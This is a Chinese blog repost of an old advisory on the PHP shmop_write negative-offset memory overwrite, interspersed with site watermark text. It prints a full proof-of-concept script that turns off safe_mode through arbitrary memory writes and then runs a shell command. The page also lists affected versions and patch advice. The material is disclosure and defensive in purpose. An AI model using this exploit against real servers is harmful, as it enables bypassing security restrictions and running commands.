php内存破坏漏洞利用,PHP shmop模块写任意内存漏洞

最新推荐文章于 2021-04-15 16:15:52 发布
最新推荐文章于 2021-04-15 16:15:52 发布
阅读量157 收藏
点赞数
文章标签: php内存破坏漏洞利用

受影响系统:

PHP PHP 5.0.2

PHP PHP 5.0.1

PHP PHP 5.0.0

PHP PHP 4.3.9

PHP PHP 4.3.8

PHP PHP 4.3.7

PHP PHP 4.3.6

PHP PHP 4.3.3

PHP PHP 4.3.2

PHP PHP 4.3.1

PHP PHP 4.3.0

PHP PHP 4.2.3

PHP PHP 4.2.2

PHP PHP 4.2.1

PHP PHP 4.2.0

PHP PHP 4.1.2

PHP PHP 4.1.1

PHP PHP 4.1.0

PHP PHP 4.1

PHP PHP 4.0.7

PHP PHP 4.0.6

PHP PHP 4.0.5

PHP PHP 4.0.4

PHP PHP 4.0.3pl1

PHP PHP 4.0.3

PHP PHP 4.0.2

PHP PHP 4.0.1pl2

PHP PHP 4.0.1pl1

PHP PHP 4.0.1

PHP PHP 4.0

不受影响系统:

PHP PHP 5.0.3

PHP PHP 4.3.10

描述:

--------------------------------------------------------------------------------

shmop是一款用于加速PHP的共享内存扩展模块。 copyright dedecms

shmop中的shmop_write函数检查偏移存在内存泄露问题,远程攻击者可以利用这个漏洞绕过safe_mode限制及进行其他攻击。 内容来自dedecms

shmop.c中的PHP_FUNCTION(shmop_write)函数没有正确检查'offset'为负的值,因此在执行如下函数时可能覆盖任意内存: 织梦内容管理系统

memcpy(shmop->addr + offset, data, writesize); 本文来自织梦

利用此漏洞可导致绕过safe_mode限制及进行其他攻击。

copyright dedecms

测试方法:

--------------------------------------------------------------------------------

本文来自织梦

警 告 本文来自织梦

以下程序(方法)可能带有攻击性,仅供研究与教学之用。使用者风险自负!

dedecms.com

Stefano Di Paola ()提供了如下测试方法:

本文来自织梦

/*

Php Safe_mode Bypass Proof of concept.

dedecms.com

Copyright 2004 Stefano Di Paola stefano.dipaola[at]wisec.it 本文来自织梦

Disclaimer: The author is not responsible of any damage this script can cause

内容来自dedecms

*/ 织梦好,好织梦

$shm_id = shmop_open(0xff2, "c", 0644, 100);

if (!$shm_id) {

echo "Couldn't create shared memory segment\n";

die;

} 织梦内容管理系统

// $data="\x01";

// the new value for safe_mode

$data="\x00";

织梦内容管理系统

// this (-3842685) is my offset to reach core_globals.safe_mode

// taken with gdb. (0x40688d83)

$offset=-3842685;

// Lets write the new value at our offset.

$shm_bytes_written = shmop_write($shm_id, $data, $offset );

if ($shm_bytes_written != strlen($data)) {

echo "Couldn't write the entire length of data\n";

}

copyright dedecms

//Now lets delete the block and close the shared memory segment

if (!shmop_delete($shm_id)) {

echo "Couldn't mark shared memory block for deletion.";

}

shmop_close($shm_id); 织梦好,好织梦

// Let's try if safe mode has been set to off

echo passthru("id");

dl("shmop.so");

?>

本文来自织梦

建议:

--------------------------------------------------------------------------------

厂商补丁:

内容来自dedecms

PHP

---

目前厂商已经发布了升级补丁以修复这个问题,请到厂商的主页下载升级到最新版:

内容来自dedecms

copyright dedecms

Alex lucky
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
php 漏洞 怎么解决,php安全漏洞怎么修复?
weixin_39869693的博客
03-09 3807
该楼层疑似违规已被系统折叠隐藏此楼查看此楼PHP PHAR扩展安全漏洞(CVE-2016-4072)PHPphp_filter_encode_url’函数整数溢出漏洞(CVE-2016-4345)PHP ‘str_pad’函数整数溢出漏洞(CVE-2016-4346)PHP‘wddx_stack_destroy’函数释放后重用漏洞(CVE-2016-7413)PHP Calendar...
php共享内存段示例分享
12-18
需要安装扩展shmop找到php安装源文件目录复制代码 代码如下:# cd /usr/local/php-5.4.0/ext/shmop# /usr/local/php/bin/phpize# ./configure –with-php-config=/usr/local/php/bin/php-config# make && make ...
php共享内存编程,php操作共享内存shmop类如何使用
weixin_39907939的博客
03-12 162
php操作共享内存shmop类如何使用发布时间:2020-10-19 16:41:00来源:亿速云阅读:74作者:小新这篇文章将为大家详细讲解有关php操作共享内存shmop类如何使用,小编觉得挺实用的,因此分享给大家做个参考,希望大家阅读完这篇文章后可以有所收获。SimpleSHM 是一个较小的抽象层,用于使用 PHP 操作共享内存,支持以一种面向对象的方式轻松操作内存段。在编使用共享内存进行...
PHP使用共享内存-Shmop
icehill的专栏
03-31 587
PHP使用共享内存-Shmop 需要先开启shomp扩展才能使用 创建内存shmop_open ($key, $flags, $mode, $size) 函数 创建或打开共享内存块 $key $flags 访问模式(类似文件的读权限) 模式 “a”,它允许您访问只读内存段 模式 “w”,它允许您访问可读内存段 模式 “c”,它创建一个新内存段,或者如果该内存段已存在,尝试打开它进行读 模式 “n”,它创建一个新内存段,如果该内存段已存在,则会失败 $mode 内存段的权
php 能共享内存吗,怎么给PHP开启shmop扩展实现共享内存
weixin_35101697的博客
03-17 98
PHP开启shmop扩展实现共享内存在项目开发中,想要实现PHP多个进程之间共享数据的功能,让客户端连接能够共享一个状态,需要开启共享内存函数shmop。如果预期考虑会遇到这方面需求,那么最好在编译PHP的时候添加–with-shmop选项。但是编译的时候没有添加,只能在重新编译配置了。一、找到php源码包里的扩展目录,进入shmop# cd /usr/local/src/php-7.1.10/...
php进程共享内存,PHP中进程间共享变量 shmop | 学步园
weixin_33647940的博客
03-11 175
类似于 asp中的 application 实现多用户的缓存共享进程间共享变量用户在一个Web应用程序中导航时,如果能在Web服务器上存储用户或会话的特定数据,从而每次请求网页时能很容易地访问这些数据,将非常有用。存储的可以是有关用户、用户首选项的信息,或者是与应用程序相关的数据,如购物车中的数据。用户每次请求包含session_start()函数调用的网页时,服务器会开始一个新进程(或重用一个空...
PHP共享内存使用与信号控制实例分析
10-18
主要介绍了PHP共享内存使用与信号控制,结合实例形式分析了php基于shmop扩展实现共享内存的进程间通信以及信号控制等相关操作技巧,需要的朋友可以参考下
PHP与C++进行IPC命名管道共享内存通信
06-10
PHP中,可以使用`shmop`扩展来操作共享内存,包括创建、打开、读取、入和删除等操作。而在C++中,可以使用POSIX标准的`shm_open`、`mmap`等函数来实现相同的功能。通过共享内存PHP和C++进程可以共享复杂的数据...
单台服务器的PHP进程之间实现共享内存的方法
01-20
开发人员要想使php进程实现共享内存的读,首先就要支持IPC函数,即php编译安装时指定:–enable-shmop 与–enable-sysvsem 两个选项。 IPC (Inter-process communication) 是一个Unix标准机制,它提供了使得在...
php多个内存破坏漏洞,php substr_replace替换指定位置字符与内存破坏漏洞
weixin_29028611的博客
03-11 129
php教程 substr_replace替换指定位置字符与内存破坏漏洞提示和注释注释:如果 start 是负数且 length 小于等于 start,则 length 为 0。$username = "zongzi";echo substr_replace($username,'**','1','2');定义和用法substr_replace() 函数把字符串的一部分替换为另一个字符串。语法sub...
php shmop 内存操作
weixin_30299709的博客
02-21 263
shmop php在linux上操作共享内存函数 关于php操作内存,我选择了shmop扩展,其方法只有6个: shmop_open 打开内存块. shmop_write 向内存块中入数据 shmop_size 获得内存块大小 shmop_read 读取内存块数据 shmop_delete 删除内存块数据 shmop_close 关闭内存块 ...
PHP 动态编译安装pcntl和shmop扩展
彼岸花的博客
09-10 570
1.获取当前系统PHP版本源码(可以从官网查找对应的版本源码) 2. 切换到pcntl扩展目录   cd /app/tools/php-7.1.6/ext/pcntl/ 3.执行phpize命令   /app/php7/bin/phpize  4.生成编译文件  ./configure --with-php-config=/app/php7/bin/php-config 5.编译安装...
php 解决乱码的通用方法
icetofyt的专栏
07-24 895
php 解决乱码的通用方法 一,出现乱码的原因分析 1,保存文件时候,文件有自己的文件编码,就是汉字,或者其他国语言,以什么编码来存储 2,输出的时候,要给内容指定编码,如以网页的形势输入时 3,从数据库取出数据时,搞不清楚数据库,设置的字符集 4,以汉字为例,汉字本来也有编码的,一个汉字gbk要二个字符,而utf8要三个字符 上面说了有可能引起乱码的潜在原因,我现在把它们排列
centos php 安全漏洞,打造安全的CENTOS服务器---php安全
weixin_28886359的博客
04-15 175
硬件配置:AMD 3200+华硕主板KST 512M DDR400 *2120G IDE软件配置:httpd-2.0.52-28.ent.centos4php-4.3.9-3.151、开启安全模式(做为商业应用的服务器不建议开启)复制内容到剪贴板代码:#vi /usr/local/Zend/etc/php.ini (没装ZO时php.ini文件位置为:/etc/php.ini...
折磨半个月终于找到php脚本所谓的“内存泄露”原因!
热门推荐
雪峰流云
07-27 3万+
最近项目改版做2期,1期是我的,当然2期也由我主要负责,我借鉴了同事和网上的多种可取方法,在性能上做了较大提升。 项目是一个后台网页爬取程序,使用php开发,基于DOMDocument+Xpath+curl多线程异步,同时少量网页使用phpQuery处理,正则表达式提取等等,处理数据的结构入MySQL。在批量爬取处理过程中,内存占用很平稳,比如开300线程同时爬取html网页,做Dom+xp
如何彻底删除Kafka中的topic (marked for deletion)
russle的专栏
09-28 2万+
工作中因为个中原因可能需要彻底清理一下kafka topic,那么如何彻底删除topic? 方法一(配置delete.topic.enable=true)   修改kafaka配置文件server.properties, 添加delete.topic.enable=true,重启kafka,之后通过kafka命令行就可以直接删除topic   通过命令行删除topic:     ./bin/kaf...
CTF 中的 PHP 漏洞利用总结
重新启程
10-12 2万+
基础知识 系统变量(超全局变量) 在全部作用域中始终可用的内置变量 1 2 3 4 5 6 7 8 9 $GLOBALS // 引用全局作用域中可用的全部变量 $_POST // 获取 post 数据,是一个字典 $_GET // 获取 get 数据,是一个字典 $_COOKIE // 获取 cookie $_SESSION // 获取 session $...
php ->read(),PHPshmop_read()”远程整数溢出漏洞
weixin_32441957的博客
03-21 294
发布日期:2011-03-08更新日期:2011-03-08受影响系统:PHP PHP 5.x不受影响系统:PHP PHP 5.3.6描述:--------------------------------------------------------------------------------BUGTRAQ ID: 46786CVE ID: CVE-2011-1092PHP是广泛使用的通用...
PHP实现多用户数据共享:APPLICATION级别的应用分析
PHPshmop扩展允许在进程间共享内存,从而实现跨用户的数据共享。但是,这种方法对服务器的配置要求较高,而且需要处理并发访问时可能出现的竞争条件。 此外,还可以通过设计一个自定义的类或函数库来模拟...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值